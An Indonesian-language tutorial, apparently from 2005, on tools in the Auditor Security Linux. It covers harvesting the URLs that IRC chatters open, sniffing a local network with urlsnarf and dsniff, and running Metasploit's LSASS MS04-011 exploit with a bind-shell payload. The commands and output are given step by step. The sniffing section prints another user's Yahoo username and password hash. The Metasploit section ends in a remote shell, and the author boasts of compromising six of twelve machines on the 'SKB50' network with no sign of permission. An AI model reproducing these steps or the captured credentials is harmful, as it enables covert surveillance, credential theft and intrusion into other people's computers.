Grabbing URL, Sniffing, dan Remote Exploit

Auditor security merupakan sebuah system operasi yang bersifat live-system berbasiskan pada knopix. Menurut penciptanya yang dituliskan pada http://remote-exploit.org , linux Auditor Security diciptakan untuk memenuhi kebutuhan para excellent-user yang dikombinasikan dengan toolset yang optimal serta penggunakan yang user friendly. Program – program open source pada auditor security menawarkan toolset yang komplit untuk meng-analysis keamanan sebuah system, byte per byte. Dalam tulisan ini akan dibahas sebagian dari security tool set yang terdapat pada linux Auditor Security. A. Grabbing URL Yang dimaksusd grabbing URL adalah mendapatkan alamat URL yang dikunjungi oleh seseorang tanpa ataupun sepengetahuan dari orang tersebut. Di bawah akan dibahas mengenai grabbing URL pada suatu channel IRC dan pada jaringan lokal yang terhubung dengan internet. 1. Grabbing URL pada channel IRC Untuk melakukan grabbing URL pada channel IRC bisa dilakukan dengan menggunkan XCHAT yang telah tersedia secara bult-in pada linux auditor. Langkah pertama tentu saja kita harus join ke channel tertentu. Setelah join ke channel tertentu langkah selanjutnya klik tab Windows kemudian pilih URL Grabber. Tunggu beberapa saat, maka jika ada salah satu user yang tergabung pada channel tersebut membuka sebuah URL, list dari URL Grabber akan bertambah. Berikut ini hasil grabbing URL yang penulis lakukan pada channel : #hnet, #skb50, #indonona, #echo, #k-elektronik, #bandung pada server dalnet tanggal 1 September 2005. ftp.orghttp://echo.or.id http://irc.jraxis.com/dalnet/default/ http://kline.dal.net/exploits/akills.htm#ma http://kline.dal.net/exploits/akills.htm#ma))) http://kline.dal.net/massads/mup.htm http://kline.dal.net/proxy/ http://miranda-im.org http://tiongkokmusic.com:2222/listen.pls http://unut.hollosite.com http://valueshells.com http://valueshells.com/disc.html http://www.dal.net/ http://www.dal.net/aup/ http://www.equinix.net http://www.kecoak.or.id http://www.malanghack.net/ http://www.rayofshadow.or.id http://www.valueshells.com irc.hackerszone.orgirc.vsnl.com www.balihack.or.idwww.bandung-dal.net WwW.BaNdUnG.tKwww.dal.net/proxies www.jraxis.comwww.malanghack.net WwW.PsYcHoPeD.InFowww.scoopsite.com www.superask.netwww.VALUESHELLS.com www.ValueShells.comwww.valueshells.com www.valueshells.comwww.w0nk.org www.zone-h.org/en/defacements/mirror/id=2840693/> www.zone-h.org/en/defacements/mirror/id=2840696/> Daftar URL diatas merupakan daftar dari URL-URL yang dikunjungi para chatter pada channel – channel diatas. Kelemahan dari XCHAT yaitu XCHAT belum mampu secara spesifik mengetahui URL yang dikunjungi tiap chatter. 2. Grabbing URL Pada Jaringan Lokal Yang Terhubung Pada Internet Selain grabbing URL pada suatu channel IRC kita juga bisa melakukan grabbing URL pada jaringan lokal yang terhubung pada internet. Untuk melakukanya kita bisa menggunakan URL Snarf. Untuk menjalankan URL Snarf ketikan perintah berikut pada konsole : hyraxz@chidori~dove# urlsnarf -i eth0 > ./grabMeBabe.txt Setelah URL Snarf berhasil dijalankan maka tugas kita selanjutnya adalah tinggal tidur dan membuka hasil grabbing keesokan hari.Berikut ini satu baris potongan dari hasil grabbing URL yang berhasil penulis capture, penulis hanya menunjukan 1 baris dari 994 baris hasil grabbing yang didapat mulai dari jam 00:15:37 sampai 06:21:10 pada tanggal 02/Sep/2005. 192.168.10.5 - - [02/Sep/2005:05:38:37 -0400] "GET http://www.friendster.com/friendrequests.php?lastact=approve&sc=933 HTTP/1.1" - - "http://www.friendster.com/friendrequests.php?statpos=homealerts" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)" Dari hasil grabbing tersebut maka kita bisa mengambil suatu analisa bahwa komputer dengan IP 192.168.10.5 pada [02/Sep/2005:05:38:37 -0400] dengan menggunakan methode GET sedang mengakses www.friendster.com dan kemungkinan besar user tersebut sedang meng-approve friend request. Sangat dimungkinkan browser dari user tersebut adalah Mozzila/5.0 dengan mamakai sistem operasi linux. B. Sniffing Menggunakan DSNIFF Sniffing merupakan usaha yang dilakukan untuk memperoleh suatu informasi tertentu dalam suatu network dangan jalan meng-capture paket – paket data yang ada pada suatu network dan kemudian menganalisinya untuk diambil informasinya yang dianggap penting. Dsiniff merupakan suatu tool sniffing yang telah tersedia pada linux auditor security. Untuk memulai sniffing ketikan perintah berikut ini: hyraxz@chidori~dove# dsniff –i eth0 –W /mnt/hda5/passwd_HhAN.db perintah diatas akan memerintahkan dsniff untuk meng-capture paket - paket yang melintasi eth0 dan menuliskan hasilnya pada sebuah file dengan nama passwd_HhAN.db yang disimpan pada directory /mnt/hda5/. Untuk membaca hasilnya gunakan perintah berikut ini: hyraxz@chidori~ dove# dsniff -r /mnt/hda5/passwd_HhAN.db Atau kalau kita ingin merubahnya dalam format ASCII sehingga file tersebut bisa dibuka menggunakan notepad saat di Windows, ketik perintah berikut : hyraxz@chidori~dove# dsniff -r /mnt/hda5/passwd_HhAN.db > /mnt/hda5/GetDownEnemy.txt Berikut ini merupakan file ASCII hasil dari sniffing yang berhasil penulis documentasikan : 09/02/05 04:58:42 tcp 192.168.10.7.1183 -> p2.rd.scd.yahoo.com.80 (http)GET /reg/login1/newym_nouc/lisu/login/us/ym/*http://login.yahoo.com/config/login?.tries=1&.src=ym&.md5=&.hash=&.js=1&. last=&promo=&.intl=us&.bypass=&.partner=&.u=b261flt1heuai&.v=0&.challenge=Ymjr9vf35ZRMTV9YkEFy0vhTsQz0&.yplus=&. emailCode=&pkg=&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A//mail.yahoo.com&login=rip_zombie &passwd=ace61b359fa543aceccf111dbd767e74&.persistent=&.hash=1&.md5=1 HTTP/1.1Host: us.rd.yahoo.com Berikut analysis dari hasil sniffing di atas: 1. Sniffing dilakukan pada tgl 02 September 2005 jam 04:58:42. Sniffing dilakukan pada koneksi TCP antara host dengan IP 192.168.10.7:1183 dengan server yahoo pada p2.rd.scd.yahoo.com:80 denagan memakai protokol HTTP. 2. User Name untuk login ke server e-mail dari user tersebut adalah rip_zombie dengan password hasil enkripsi MD5 “ace61b359fa543aceccf111dbd767e74” (tanpa tanda petik). 3. Server mail yahoo menggunakan methode enkripsi MD5. C. Remote Exploit Remote exploit adalah suatu program yang dijalankan pada computer attacker, digunakan untuk menginjeksi komputer target sehingga attacker memperoleh hak akses lebih dari yang diijinkan tanpa ataupun sepengetahuan dari korban. Linux Auditor Security menyediakan tool tersebut dengan nama Metasploit. Menyusup di Jaringan SKB50 Menggunakan Metasploit Sebelum memulainya tentu saja komputer attaccker harus di set IP-nya sesuai dengan IP dari jaringan SKB50. berikut ini konfigurasi IP dari komputer attacker yang telah disesuaikan dengan konfigurasi IP pada jaringan SKB50. hyraxz@chidori~dove# ifconfig –eth0 192.168.0.10 netmask 255.255.255.0 hyraxz@chidori~dove# ifconfig eth0 Link encap:Ethernet HWaddr 00:E0:18:F3:9A:D0 inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:712 errors:0 dropped:0 overruns:0 frame:0 TX packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:69398 (67.7 KiB) TX bytes:595 (595.0 b) Interrupt:5 Base address:0x9800 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:10 errors:0 dropped:0 overruns:0 frame:0 TX packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:500 (500.0 b) TX bytes:500 (500.0 b) Selanjutnya ketikan perintah dibawah ini untuk memanggil console metasploit : hyraxz@chidori~dove# cd /opt/auditor/metasploit hyraxz@chidori~dove# ./msfconsole jika berhasil maka akan muncul tulisan seperti berikut ini : 888 888 d8b888 888 888 Y8P888 888 888 888 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888 888 888 888 + -- --=[ msfconsole v2.4 [75 exploits - 75 payloads] msf > untuk memulai penggunakanya ketikan perintah-perintah dibawah ini: msf > show exploits Metasploit Framework Loaded Exploits ==================================== 3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow Credits afp_loginext aim_goaway apache_chunked_win32 arkeia_agent_access arkeia_type77_macos arkeia_type77_win32 backupexec_ns bakbone_netvault_heap blackice_pam_icq cabrightstor_disco cabrightstor_disco_servicepc cabrightstor_uniagent calicclnt_getconfig calicserv_getconfig distcc_exec exchange2000_xexch50 globalscapeftp_user_input ia_webmail icecast_header iis40_htr iis50_printer_overflow iis50_webdav_ntdll iis_fp30reg_chunked iis_nsiislog_post iis_source_dumper iis_w3who_overflow imail_imap_delete imail_ldap irix_lpsched_exec lsass_ms04_011 maxdb_webdbm_get_overflow mercantec_softcart minishare_get_overflow msasn1_ms04_007_killbill msmq_deleteobject_ms05_017 msrpc_dcom_ms03_026 mssql2000_preauthentication mssql2000_resolution netterm_netftpd_user_overflow openview_omniback oracle9i_xdb_ftp oracle9i_xdb_ftp_pass payload_handler poptop_negative_read realserver_describe_linux samba_nttrans samba_trans2open samba_trans2open_osx samba_trans2open_solsparc sambar6_search_results seattlelab_mail_55 sentinel_lm7_overflow servu_mdtm_overflow smb_sniffer solaris_dtspcd_noir solaris_kcms_readfile solaris_lpd_exec solaris_sadmind_exec solaris_snmpxdmid solaris_ttyprompt squid_ntlm_authenticate svnserve_date trackercam_phparg_overflow uow_imap4_copy uow_imap4_lsub ut2004_secure_linux ut2004_secure_win32 warftpd_165_pass warftpd_165_user webstar_ftp_user windows_ssl_pct wins_ms04_045 wsftp_server_503_mkd Metasploit Framework Credits AppleFileServer LoginExt PathName Overflow AOL Instant Messenger goaway Overflow Apache Win32 Chunked Encoding Arkeia Backup Client Remote Access Arkeia Backup Client Type 77 Overflow (Mac OS X) Arkeia Backup Client Type 77 Overflow (Win32) Veritas Backup Exec Name Service Overflow BakBone NetVault Remote Heap Overflow ISS PAM.dll ICQ Parser Buffer Overflow CA BrightStor Discovery Service Overflow CA BrightStor Discovery Service SERVICEPC Overflo CA BrightStor Universal Agent Overflow CA License Client GETCONFIG Overflow CA License Server GETCONFIG Overflow DistCC Daemon Command Execution Exchange 2000 MS03-46 Heap Overflow GlobalSCAPE Secure FTP Server user input overflow IA WebMail 3.x Buffer Overflow Icecast (<= 2.0.1) Header Overwrite (win32) IIS 4.0 .HTR Buffer Overflow IIS 5.0 Printer Buffer Overflow IIS 5.0 WebDAV ntdll.dll Overflow IIS FrontPage fp30reg.dll Chunked Overflow IIS nsiislog.dll ISAPI POST Overflow IIS Web Application Source Code Disclosure IIS w3who.dll ISAPI Overflow IMail IMAP4D Delete Overflow IMail LDAP Service Buffer Overflow Irix lpsched Command Execution Microsoft LSASS MSO4-011 Overflow MaxDB WebDBM GET Buffer Overflow Mercantec SoftCart CGI Overflow Minishare 1.41 Buffer Overflow Microsoft ASN.1 Library Bitstring Heap Overflow Microsoft Message Queueing Service MSO5-017 Microsoft RPC DCOM MSO3-026 MSSQL 2000/MSDE Hello Buffer Overflow MSSQL 2000/MSDE Resolution Overflow NetTerm NetFTPD USER Buffer Overflow HP OpenView Omniback II Command Execution Oracle 9i XDB FTP UNLOCK Overflow (win32) Oracle 9i XDB FTP PASS Overflow (win32) Metasploit Framework Payload Handler Poptop Negative Read Overflow RealServer Describe Buffer Overflow Samba Fragment Reassembly Overflow Samba trans2open Overflow Samba trans2open Overflow (Mac OS X) Samba trans2open Overflow (Solaris SPARC) Sambar 6 Search Results Buffer Overflow Seattle Lab Mail 5.5 POP3 Buffer Overflow SentinelLM UDP Buffer Overflow Serv-U FTPD MDTM Overflow SMB Password Capture Service Solaris dtspcd Heap Overflow Solaris KCMS Arbitary File Read Solaris LPD Command Execution Solaris sadmind Command Execution Solaris snmpXdmid AddComponent Overflow Solaris in.telnetd TTYPROMPT Buffer Overflow Squid NTLM Authenticate Overflow Subversion Date Svnserve TrackerCam PHP Argument Buffer Overflow University of Washington IMAP4 COPY Overflow University of Washington IMAP4 LSUB Overflow Unreal Tournament 2004 "secure" Overflow (Linux) Unreal Tournament 2004 "secure" Overflow (Win32) War-FTPD 1.65 PASS Overflow War-FTPD 1.65 USER Overflow WebSTAR FTP Server USER Overflow Microsoft SSL PCT MS04-011 Overflow Microsoft WINS MS04-045 Code Execution WS-FTP Server 5.03 MKD Overflow msf > use lsass_ms04_011 msf lsass_ms04_011 > show payloads Metasploit Framework Usable Payloads ==================================== win32_adduser win32_bind win32_bind_dllinject win32_bind_meterpreter win32_bind_stg win32_bind_stg_upexec win32_bind_vncinject win32_exec win32_passivex win32_passivex_meterpreter win32_passivex_stg win32_passivex_vncinject win32_reverse win32_reverse_dllinject win32_reverse_meterpreter win32_reverse_ord win32_reverse_ord_vncinject win32_reverse_stg win32_reverse_stg_upexec win32_reverse_vncinject Windows Execute net user /ADD Windows Bind Shell Windows Bind DLL Inject Windows Bind Meterpreter DLL Inject Windows Staged Bind Shell Windows Staged Bind Upload/Execute Windows Bind VNC Server DLL Inject Windows Execute Command Windows PassiveX ActiveX Injection Payload Windows PassiveX ActiveX Inject Meterpreter Payload Windows Staged PassiveX Shell Windows PassiveX ActiveX Inject VNC Server Payload Windows Reverse Shell Windows Reverse DLL Inject Windows Reverse Meterpreter DLL Inject Windows Staged Reverse Ordinal Shell Windows Reverse Ordinal VNC Server Inject Windows Staged Reverse Shell Windows Staged Reverse Upload/Execute Windows Reverse VNC Server Inject msf lsass_ms04_011 > set PAYLOAD win32_bind PAYLOAD -> win32_bind msf lsass_ms04_011(win32_bind) > set RHOST 192.168.0.27 RHOST -> 192.168.0.27 msf lsass_ms04_011(win32_bind) > show options Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ ------------ ------------------ required RHOST 192.168.0.19 The target address required RPORT 139 The target port Payload: Name Default Description -------- -------- ------- ------------------------------------------ required EXITFUNC thread Exit technique: "process", "thread", "seh" required LPORT 4444 Listening port for bind shell Target: Automatic msf lsass_ms04_011(win32_bind) > exploit RHOST -> 192.168.0.27 msf lsass_ms04_011(win32_bind) > exploit [*] Starting Bind Handler. [*] Detected a Windows XP target (KICKS) [*] Windows XP may require two attempts [*] Sending 8 DCE request fragments... [*] Sending the final DCE fragment [*] Got connection from 192.168.0.10:1382 <-> 192.168.0.27:4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> netstat -a netstat -a Active Connections Protocol Local Address Foreign Address State TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP UDP UDP UDP UDP UDP UDP UDP UDP kicks:epmap kicks:microsoft-ds kicks:1025 kicks:1056 kicks:1090 kicks:1095 kicks:1098 kicks:1130 kicks:4444 kicks:5000 kicks:netbios-ssn kicks:1162 kicks:1169 kicks:4444 kicks:microsoft-ds kicks:isakmp kicks:ntp kicks:1900 kicks:ntp kicks:netbios-ns kicks:netbios-dgm kicks:1900 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 192.168.0.10:1382 *:* *:* *:* *:* *:* *:* *:* *:* LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING ESTABLISHED ^c Caught interrupt, exit connection? [y/n]y msf lsass_ms04_011(win32_bind) > Analisa dari hasil aktivitas diatas adalah sebagai berikut : metasploit meng-attack korban melalui port 139 kemudian memasukan payload yang akan membangun hubungan antara korban dengan attacker dengan menggunakan mode koneksi TCP, dimana hubungan dilakukan melalui port 4444 pada sisi korban dan port 1382 pada sisi attacker.Setelah bind port antara attacker dengan korban terbentuk maka attacker menguasai sepenuhnya aktifitas dari komputer korban. Dari 12 komputer yang hidup saat analisa dilakukan pada jaringan lokal SKB50 6 buah komputer mampu di tembus dengan menggunakan metasploit, ini berarti bahwa 50% jaringan SKB50 pada saat itu ada di tangan attacker ;).